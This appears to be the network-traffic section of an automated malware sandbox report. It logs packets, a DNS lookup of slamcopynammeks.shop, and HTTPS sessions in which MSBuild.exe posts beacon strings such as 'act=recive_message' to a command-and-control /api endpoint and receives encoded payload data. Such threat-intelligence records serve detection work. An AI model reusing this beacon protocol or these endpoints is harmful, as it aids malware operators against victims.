May 24, 2024 10:26:04.095675945 CEST	443	49708	104.21.12.112	192.168.2.5
May 24, 2024 10:26:04.095781088 CEST	49708	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:04.097827911 CEST	49708	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:04.097856998 CEST	443	49708	104.21.12.112	192.168.2.5
May 24, 2024 10:26:04.098201036 CEST	443	49708	104.21.12.112	192.168.2.5
May 24, 2024 10:26:04.099936962 CEST	49708	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:04.100099087 CEST	49708	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:04.100147963 CEST	443	49708	104.21.12.112	192.168.2.5
May 24, 2024 10:26:05.033406019 CEST	443	49708	104.21.12.112	192.168.2.5
May 24, 2024 10:26:05.033653975 CEST	443	49708	104.21.12.112	192.168.2.5
May 24, 2024 10:26:05.033849955 CEST	49708	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:05.034007072 CEST	49708	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:05.034048080 CEST	443	49708	104.21.12.112	192.168.2.5
May 24, 2024 10:26:05.077790022 CEST	49709	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:05.077881098 CEST	443	49709	104.21.12.112	192.168.2.5
May 24, 2024 10:26:05.077996969 CEST	49709	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:05.078385115 CEST	49709	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:05.078421116 CEST	443	49709	104.21.12.112	192.168.2.5
May 24, 2024 10:26:05.614173889 CEST	443	49709	104.21.12.112	192.168.2.5
May 24, 2024 10:26:05.614444971 CEST	49709	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:05.616014004 CEST	49709	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:05.616045952 CEST	443	49709	104.21.12.112	192.168.2.5
May 24, 2024 10:26:05.616842031 CEST	443	49709	104.21.12.112	192.168.2.5
May 24, 2024 10:26:05.617966890 CEST	49709	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:05.618149042 CEST	49709	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:05.618217945 CEST	443	49709	104.21.12.112	192.168.2.5
May 24, 2024 10:26:05.618293047 CEST	49709	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:05.618308067 CEST	443	49709	104.21.12.112	192.168.2.5
May 24, 2024 10:26:06.303879976 CEST	443	49709	104.21.12.112	192.168.2.5
May 24, 2024 10:26:06.304100037 CEST	443	49709	104.21.12.112	192.168.2.5
May 24, 2024 10:26:06.304311991 CEST	49709	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:06.307766914 CEST	49709	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:06.307811022 CEST	443	49709	104.21.12.112	192.168.2.5
May 24, 2024 10:26:06.394505978 CEST	49710	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:06.394602060 CEST	443	49710	104.21.12.112	192.168.2.5
May 24, 2024 10:26:06.394812107 CEST	49710	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:06.395319939 CEST	49710	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:06.395358086 CEST	443	49710	104.21.12.112	192.168.2.5
May 24, 2024 10:26:06.946048975 CEST	443	49710	104.21.12.112	192.168.2.5
May 24, 2024 10:26:06.946295977 CEST	49710	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:06.948184967 CEST	49710	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:06.948215961 CEST	443	49710	104.21.12.112	192.168.2.5
May 24, 2024 10:26:06.949022055 CEST	443	49710	104.21.12.112	192.168.2.5
May 24, 2024 10:26:06.950822115 CEST	49710	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:06.951025009 CEST	49710	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:06.951086044 CEST	443	49710	104.21.12.112	192.168.2.5
May 24, 2024 10:26:06.951206923 CEST	49710	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:06.951224089 CEST	443	49710	104.21.12.112	192.168.2.5
May 24, 2024 10:26:07.490089893 CEST	49675	443	192.168.2.5	23.1.237.91
May 24, 2024 10:26:07.490089893 CEST	49674	443	192.168.2.5	23.1.237.91
May 24, 2024 10:26:07.583913088 CEST	49673	443	192.168.2.5	23.1.237.91
May 24, 2024 10:26:07.915713072 CEST	443	49710	104.21.12.112	192.168.2.5
May 24, 2024 10:26:07.915956974 CEST	443	49710	104.21.12.112	192.168.2.5
May 24, 2024 10:26:07.916199923 CEST	49710	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:07.916201115 CEST	49710	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:07.968481064 CEST	49711	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:07.968573093 CEST	443	49711	104.21.12.112	192.168.2.5
May 24, 2024 10:26:07.968694925 CEST	49711	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:07.968981981 CEST	49711	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:07.969027042 CEST	443	49711	104.21.12.112	192.168.2.5
May 24, 2024 10:26:08.224560022 CEST	49710	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:08.224642038 CEST	443	49710	104.21.12.112	192.168.2.5
May 24, 2024 10:26:08.469177008 CEST	443	49711	104.21.12.112	192.168.2.5
May 24, 2024 10:26:08.469782114 CEST	49711	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:08.471699953 CEST	49711	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:08.471724033 CEST	443	49711	104.21.12.112	192.168.2.5
May 24, 2024 10:26:08.472129107 CEST	443	49711	104.21.12.112	192.168.2.5
May 24, 2024 10:26:08.473432064 CEST	49711	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:08.473617077 CEST	49711	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:08.473647118 CEST	443	49711	104.21.12.112	192.168.2.5
May 24, 2024 10:26:09.235660076 CEST	443	49705	23.1.237.91	192.168.2.5
May 24, 2024 10:26:09.235842943 CEST	443	49711	104.21.12.112	192.168.2.5
May 24, 2024 10:26:09.235937119 CEST	443	49711	104.21.12.112	192.168.2.5
May 24, 2024 10:26:09.235991001 CEST	49705	443	192.168.2.5	23.1.237.91
May 24, 2024 10:26:09.236023903 CEST	49711	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:09.245407104 CEST	49711	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:09.245471954 CEST	443	49711	104.21.12.112	192.168.2.5
May 24, 2024 10:26:09.265706062 CEST	49712	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:09.265753984 CEST	443	49712	104.21.12.112	192.168.2.5
May 24, 2024 10:26:09.265947104 CEST	49712	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:09.266376972 CEST	49712	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:09.266396999 CEST	443	49712	104.21.12.112	192.168.2.5
May 24, 2024 10:26:09.827049017 CEST	443	49712	104.21.12.112	192.168.2.5
May 24, 2024 10:26:09.827195883 CEST	49712	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:09.828721046 CEST	49712	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:09.828742981 CEST	443	49712	104.21.12.112	192.168.2.5
May 24, 2024 10:26:09.829155922 CEST	443	49712	104.21.12.112	192.168.2.5
May 24, 2024 10:26:09.830292940 CEST	49712	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:09.830379963 CEST	49712	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:09.830389023 CEST	443	49712	104.21.12.112	192.168.2.5
May 24, 2024 10:26:10.535716057 CEST	443	49712	104.21.12.112	192.168.2.5
May 24, 2024 10:26:10.535851002 CEST	443	49712	104.21.12.112	192.168.2.5
May 24, 2024 10:26:10.535937071 CEST	49712	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:10.536005974 CEST	49712	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:10.536041021 CEST	443	49712	104.21.12.112	192.168.2.5
May 24, 2024 10:26:10.995575905 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:10.995665073 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:10.995884895 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:10.996309042 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:10.996341944 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:11.486227989 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:11.486375093 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.487504005 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.487517118 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:11.487848997 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:11.489417076 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.490279913 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.490315914 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:11.490421057 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.490458965 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:11.490577936 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.490624905 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:11.490756035 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.490783930 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:11.490927935 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.490956068 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:11.491127014 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.491173029 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:11.491188049 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.491358995 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.491389990 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.510258913 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:11.510500908 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.510557890 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:11.510595083 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.510618925 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.510761023 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.510804892 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.516132116 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:11.516457081 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.516525984 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:11.516546011 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:11.522059917 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:13.859759092 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:13.859890938 CEST	443	49713	104.21.12.112	192.168.2.5
May 24, 2024 10:26:13.860011101 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:13.877173901 CEST	49713	443	192.168.2.5	104.21.12.112
May 24, 2024 10:26:13.877223015 CEST	443	49713	104.21.12.112	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 24, 2024 10:26:01.033318043 CEST	50363	53	192.168.2.5	1.1.1.1
May 24, 2024 10:26:01.047554016 CEST	53	50363	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 24, 2024 10:26:01.033318043 CEST	192.168.2.5	1.1.1.1	0x4dfd	Standard query (0)	slamcopynammeks.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 24, 2024 10:26:01.047554016 CEST	1.1.1.1	192.168.2.5	0x4dfd	No error (0)	slamcopynammeks.shop		104.21.12.112	A (IP address)	IN (0x0001)	false
May 24, 2024 10:26:01.047554016 CEST	1.1.1.1	192.168.2.5	0x4dfd	No error (0)	slamcopynammeks.shop		172.67.152.67	A (IP address)	IN (0x0001)	false
May 24, 2024 10:26:18.663379908 CEST	1.1.1.1	192.168.2.5	0xa239	No error (0)	windowsupdatebg.s.llnwi.net		87.248.204.0	A (IP address)	IN (0x0001)	false
May 24, 2024 10:26:19.422689915 CEST	1.1.1.1	192.168.2.5	0xf929	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 10:26:19.422689915 CEST	1.1.1.1	192.168.2.5	0xf929	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

slamcopynammeks.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	104.21.12.112	443	5316	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-24 08:26:01 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: slamcopynammeks.shop
2024-05-24 08:26:01 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-05-24 08:26:02 UTC	810	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 08:26:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l0abltnemqc69geu7f0gmcbbmd; expires=Tue, 17-Sep-2024 02:12:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N3j5k4oPtdmON0RCT4CzMNLgIz5OTBaxXCauJNreqUL%2FdDOt6gN%2BwFqfn4WyTXPI3KHY%2B9v2u7L9zV3wt46FFzFzkb7CajMNL7NerG5lz%2F4VbCA0pI5ssPpnYWsANHwGySncxu4fQw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888be6013f146a59-EWR alt-svc: h3=":443"; ma=86400
2024-05-24 08:26:02 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-05-24 08:26:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49707	104.21.12.112	443	5316	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-24 08:26:02 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 55 Host: slamcopynammeks.shop
2024-05-24 08:26:02 UTC	55	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 52 54 53 43 66 32 2d 2d 53 75 6e 61 72 75 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=RTSCf2--Sunaru&j=default
2024-05-24 08:26:03 UTC	808	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 08:26:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pie7e3njjf6bgd0r657ogvi3nd; expires=Tue, 17-Sep-2024 02:12:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sLQ91TQR6iYX3kE33tiQG35PPyc1vVVjyoneocGd6gTAS41aSZtzvp0EOgL5OEHRci6Kcz1BC7zuR6M%2F6A%2FF7GjEW5P2mliKiZDeR%2BXiy7l2OVNV0227DcXZuXUpXsRBgkjxykpWjQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888be607dcb70f60-EWR alt-svc: h3=":443"; ma=86400
2024-05-24 08:26:03 UTC	561	IN	Data Raw: 33 64 62 34 0d 0a 7a 48 58 33 52 4f 33 6c 30 37 58 39 38 6a 68 43 45 44 58 35 73 70 45 50 33 72 58 52 4c 38 73 33 55 51 44 52 6c 58 51 59 4e 4c 4f 33 66 2f 35 6d 6d 38 66 70 6c 63 6e 65 4d 6b 73 79 52 70 79 51 71 79 2b 71 78 36 52 4b 35 7a 31 59 49 72 44 78 56 69 49 55 31 61 30 5a 68 43 48 42 37 39 71 58 6b 49 6f 61 65 44 42 75 38 37 76 71 42 64 65 38 38 30 71 6c 46 57 73 67 38 2b 49 52 65 6c 48 4c 75 42 43 5a 4e 34 53 4b 76 66 57 51 6c 30 77 6a 66 56 53 4b 32 62 39 6d 73 5a 66 39 4a 63 49 2b 63 32 57 72 74 30 34 34 46 76 36 70 41 5a 59 4a 6a 4a 61 34 6c 39 48 34 4d 55 73 79 55 49 32 51 71 79 2f 38 36 66 4e 66 71 6b 55 77 62 61 4c 4a 56 69 4a 50 37 2b 34 63 67 79 47 66 68 4b 66 63 6b 70 78 4c 48 6a 49 50 7a 34 4b 68 50 2b 36 46 72 41 33 42 50 69 77 4b 32 Data Ascii: 3db4zHX3RO3l07X98jhCEDX5spEP3rXRL8s3UQDRlXQYNLO3f/5mm8fplcneMksyRpyQqy+qx6RK5z1YIrDxViIU1a0ZhCHB79qXkIoaeDBu87vqBde880qlFWsg8+IRelHLuBCZN4SKvfWQl0wjfVSK2b9msZf9JcI+c2Wrt044Fv6pAZYJjJa4l9H4MUsyUI2Qqy/86fNfqkUwbaLJViJP7+4cgyGfhKfckpxLHjIPz4KhP+6FrA3BPiwK2
2024-05-24 08:26:03 UTC	1369	IN	Data Raw: 69 56 38 31 6b 7a 34 47 2f 31 70 4b 51 53 43 68 35 58 4a 37 43 2b 47 53 78 32 72 4e 41 6f 31 6f 77 59 72 54 39 48 48 56 63 31 61 4d 61 6b 79 61 50 78 2f 2b 2f 39 50 73 61 4a 32 6f 58 77 35 4b 7a 54 72 6e 48 74 45 47 2f 46 77 6b 69 32 35 77 4a 4e 44 32 54 37 48 2f 2b 50 2b 66 73 32 70 65 59 6e 42 70 34 4d 42 65 54 31 66 42 75 74 39 69 77 52 61 4a 48 4d 33 43 31 2b 68 4e 6f 55 4e 53 67 48 5a 59 30 68 59 6d 33 31 4a 61 62 55 79 56 31 55 39 75 65 6d 77 62 58 6c 37 52 56 36 51 31 78 49 70 4c 36 48 58 5a 63 78 71 35 58 2f 55 32 51 79 64 6d 38 68 76 67 78 53 7a 4a 51 6c 35 43 72 4c 2f 7a 54 73 6b 6d 6f 55 54 31 73 74 2f 73 51 64 46 76 65 71 42 32 56 49 59 57 50 75 64 61 53 6d 31 55 67 64 31 71 66 31 76 39 73 75 5a 66 39 4a 63 49 2b 63 32 57 72 74 30 34 34 46 76 Data Ascii: iV81kz4G/1pKQSCh5XJ7C+GSx2rNAo1owYrT9HHVc1aMakyaPx/+/9PsaJ2oXw5KzTrnHtEG/Fwki25wJND2T7H/+P+fs2peYnBp4MBeT1fBut9iwRaJHM3C1+hNoUNSgHZY0hYm31JabUyV1U9uemwbXl7RV6Q1xIpL6HXZcxq5X/U2Qydm8hvgxSzJQl5CrL/zTskmoUT1st/sQdFveqB2VIYWPudaSm1Ugd1qf1v9suZf9JcI+c2Wrt044Fv
2024-05-24 08:26:03 UTC	1369	IN	Data Raw: 4b 6f 36 56 74 74 36 57 6d 6c 73 75 66 56 79 58 31 65 46 6d 73 39 2b 38 54 4b 52 59 4f 47 61 7a 74 31 67 53 50 62 72 75 45 49 31 6d 31 38 58 78 39 70 4b 66 53 43 4e 6a 46 61 37 54 2f 57 4f 37 77 66 4d 6c 77 6b 70 39 43 74 6a 75 66 68 45 39 6b 61 6b 62 31 58 37 4e 78 37 44 62 6b 35 46 56 4a 6e 68 66 6d 4e 48 68 5a 4c 50 66 76 45 53 6f 56 6a 64 6a 75 65 55 45 65 6c 72 44 6f 68 32 54 4b 59 4b 4c 38 5a 6e 33 2b 7a 46 67 64 55 2f 62 69 4c 45 74 6c 74 53 6e 54 71 4d 58 42 6d 47 39 2b 52 46 73 46 72 6e 46 43 4e 74 4f 35 4a 37 5a 76 50 54 51 58 53 77 79 44 39 6d 51 2f 6d 79 30 30 61 46 43 70 46 59 39 62 4c 7a 79 47 58 4a 57 30 61 4d 53 6b 53 32 45 68 4c 7a 54 6a 5a 70 61 4b 48 64 57 6b 64 71 7a 49 39 53 38 32 41 32 75 54 58 4d 36 38 62 63 6e 62 56 32 54 6d 78 53 Data Ascii: Ko6Vtt6WmlsufVyX1eFms9+8TKRYOGazt1gSPbruEI1m18Xx9pKfSCNjFa7T/WO7wfMlwkp9CtjufhE9kakb1X7Nx7Dbk5FVJnhfmNHhZLPfvESoVjdjueUEelrDoh2TKYKL8Zn3+zFgdU/biLEtltSnTqMXBmG9+RFsFrnFCNtO5J7ZvPTQXSwyD9mQ/my00aFCpFY9bLzyGXJW0aMSkS2EhLzTjZpaKHdWkdqzI9S82A2uTXM68bcnbV2TmxS
2024-05-24 08:26:03 UTC	1369	IN	Data Raw: 4c 66 53 6b 70 64 52 49 32 42 46 6d 4e 54 39 59 66 79 5a 32 79 62 43 46 54 52 36 38 36 39 55 4f 6e 50 47 72 51 65 54 4a 63 2f 76 32 73 6a 52 2b 44 45 35 47 6a 7a 77 6b 50 52 68 2f 49 2f 78 44 61 6c 62 50 32 6d 30 2f 42 31 2b 55 74 47 6a 48 4a 73 6f 68 6f 75 35 32 35 69 43 56 79 56 36 58 5a 4c 56 2f 32 43 2f 78 62 42 4d 36 52 74 62 43 64 69 33 45 57 49 57 69 65 78 58 73 68 57 34 70 50 47 2f 39 49 38 55 53 42 6c 4f 38 37 75 59 4c 62 76 62 38 78 58 72 46 54 4a 71 74 50 6b 53 61 46 6a 44 6f 42 43 56 49 49 65 50 74 74 75 52 6e 6b 67 6f 63 31 65 56 33 2f 74 6b 75 4e 61 33 53 61 56 53 63 79 7a 62 6e 48 30 36 55 63 6e 75 54 39 64 6d 70 34 53 72 7a 64 32 2b 55 53 42 31 52 34 33 4c 73 77 58 58 79 50 30 6c 77 6b 78 62 43 64 69 33 45 58 59 57 69 65 78 58 6b 53 32 46 Data Ascii: LfSkpdRI2BFmNT9YfyZ2ybCFTR6869UOnPGrQeTJc/v2sjR+DE5GjzwkPRh/I/xDalbP2m0/B1+UtGjHJsohou525iCVyV6XZLV/2C/xbBM6RtbCdi3EWIWiexXshW4pPG/9I8USBlO87uYLbvb8xXrFTJqtPkSaFjDoBCVIIePttuRnkgoc1eV3/tkuNa3SaVScyzbnH06UcnuT9dmp4Srzd2+USB1R43LswXXyP0lwkxbCdi3EXYWiexXkS2F
2024-05-24 08:26:03 UTC	1369	IN	Data Raw: 53 54 55 43 6c 78 57 35 33 52 2f 57 32 79 31 2f 4d 44 77 54 35 59 49 72 54 76 56 69 49 55 6b 59 34 63 67 7a 4f 4d 6c 37 66 51 6b 39 41 79 53 32 30 5a 38 37 76 71 42 64 65 38 38 30 71 6c 46 57 73 67 38 2f 6b 45 66 6c 66 52 70 68 36 5a 4c 59 65 56 74 74 43 55 6e 6c 51 72 64 6c 75 53 32 2f 70 6f 73 4e 61 34 52 4b 78 52 4f 57 53 2b 74 31 67 53 50 62 72 75 45 49 31 6d 31 38 58 78 2b 35 79 66 55 57 41 61 50 49 53 65 6d 77 61 6c 76 39 67 6d 36 56 49 2f 49 75 75 31 56 6e 31 65 32 61 41 55 6b 79 32 44 69 37 44 65 6d 5a 56 53 4a 33 31 51 6b 74 66 7a 61 36 37 51 76 6b 53 70 58 6a 70 6f 74 2f 59 64 4f 68 69 35 78 58 7a 56 49 5a 66 48 36 5a 58 66 6f 6c 30 32 59 6c 54 62 75 4a 68 79 38 72 7a 62 4a 72 41 39 57 41 6e 7a 38 42 6f 36 44 70 50 75 47 6f 63 6e 69 70 57 31 32 Data Ascii: STUClxW53R/W2y1/MDwT5YIrTvViIUkY4cgzOMl7fQk9AyS20Z87vqBde880qlFWsg8/kEflfRph6ZLYeVttCUnlQrdluS2/posNa4RKxROWS+t1gSPbruEI1m18Xx+5yfUWAaPISemwalv9gm6VI/Iuu1Vn1e2aAUky2Di7DemZVSJ31Qktfza67QvkSpXjpot/YdOhi5xXzVIZfH6ZXfol02YlTbuJhy8rzbJrA9WAnz8Bo6DpPuGocnipW12
2024-05-24 08:26:03 UTC	1369	IN	Data Raw: 73 66 56 53 55 30 2f 42 73 74 73 57 68 51 61 42 64 4e 6d 36 34 2b 52 42 6f 55 4e 36 6e 46 4a 59 76 69 49 2b 39 33 5a 79 58 47 6d 34 61 50 50 43 51 39 48 58 38 6a 2f 45 4e 69 6b 49 6a 62 2f 4f 66 66 57 55 59 75 63 55 4f 2f 55 33 6b 78 37 62 62 33 38 67 59 59 48 70 61 6b 39 72 33 61 72 48 51 74 55 53 37 58 44 5a 73 73 2f 4d 64 64 56 44 56 72 52 65 48 49 49 75 50 73 74 71 53 6e 6c 6b 6b 4d 68 6e 7a 75 35 67 74 75 38 2f 7a 46 65 73 56 41 57 2b 39 37 42 6c 39 52 39 76 75 66 2f 34 35 77 65 2f 61 7a 76 66 37 4d 57 42 31 57 39 75 49 73 53 32 34 32 61 46 47 71 46 34 34 62 4c 54 34 45 33 42 57 33 71 6f 55 6d 79 32 4f 68 4c 6e 61 6b 70 35 51 4b 58 74 51 6c 39 54 30 4c 66 4b 2f 32 43 62 70 55 69 73 69 36 37 56 57 55 58 66 38 67 68 43 50 5a 75 66 73 72 70 6e 33 2b 30 Data Ascii: sfVSU0/BstsWhQaBdNm64+RBoUN6nFJYviI+93ZyXGm4aPPCQ9HX8j/ENikIjb/OffWUYucUO/U3kx7bb38gYYHpak9r3arHQtUS7XDZss/MddVDVrReHIIuPstqSnlkkMhnzu5gtu8/zFesVAW+97Bl9R9vuf/45we/azvf7MWB1W9uIsS242aFGqF44bLT4E3BW3qoUmy2OhLnakp5QKXtQl9T0LfK/2CbpUisi67VWUXf8ghCPZufsrpn3+0
2024-05-24 08:26:03 UTC	1369	IN	Data Raw: 6d 4d 62 2b 66 66 79 2f 32 46 4c 6e 50 56 68 37 32 35 78 39 4f 6c 48 64 37 6b 2f 58 5a 6f 6d 4f 74 39 43 5a 6e 6b 67 6c 64 46 69 55 32 66 70 70 74 4e 53 7a 53 61 31 53 4e 6d 47 2f 2f 42 46 35 57 64 57 6e 47 5a 77 70 7a 38 6e 5a 76 50 54 51 58 54 67 79 44 39 6d 51 30 6e 61 2f 32 37 34 4e 77 54 34 73 4c 4e 75 63 44 78 49 39 75 75 34 51 6d 57 62 58 78 66 48 62 6b 5a 56 61 4b 6e 52 54 6e 74 62 35 61 4c 7a 63 73 45 4b 74 55 7a 64 74 73 2f 77 66 65 31 44 55 70 42 79 54 4b 34 79 42 74 35 66 52 2b 44 46 4c 4d 6c 43 44 6b 4b 73 76 2f 50 65 6f 51 4b 56 53 63 77 72 59 36 46 67 53 50 63 6a 47 66 50 35 6d 69 49 76 78 6a 39 33 51 55 53 78 32 55 4a 76 64 38 47 57 35 30 37 6c 49 71 56 30 68 61 72 50 77 42 47 68 57 32 4b 73 62 6c 69 61 4c 67 62 6a 52 6e 4a 51 61 62 68 6f Data Ascii: mMb+ffy/2FLnPVh725x9OlHd7k/XZomOt9CZnkgldFiU2fpptNSzSa1SNmG//BF5WdWnGZwpz8nZvPTQXTgyD9mQ0na/274NwT4sLNucDxI9uu4QmWbXxfHbkZVaKnRTntb5aLzcsEKtUzdts/wfe1DUpByTK4yBt5fR+DFLMlCDkKsv/PeoQKVScwrY6FgSPcjGfP5miIvxj93QUSx2UJvd8GW507lIqV0harPwBGhW2KsbliaLgbjRnJQabho
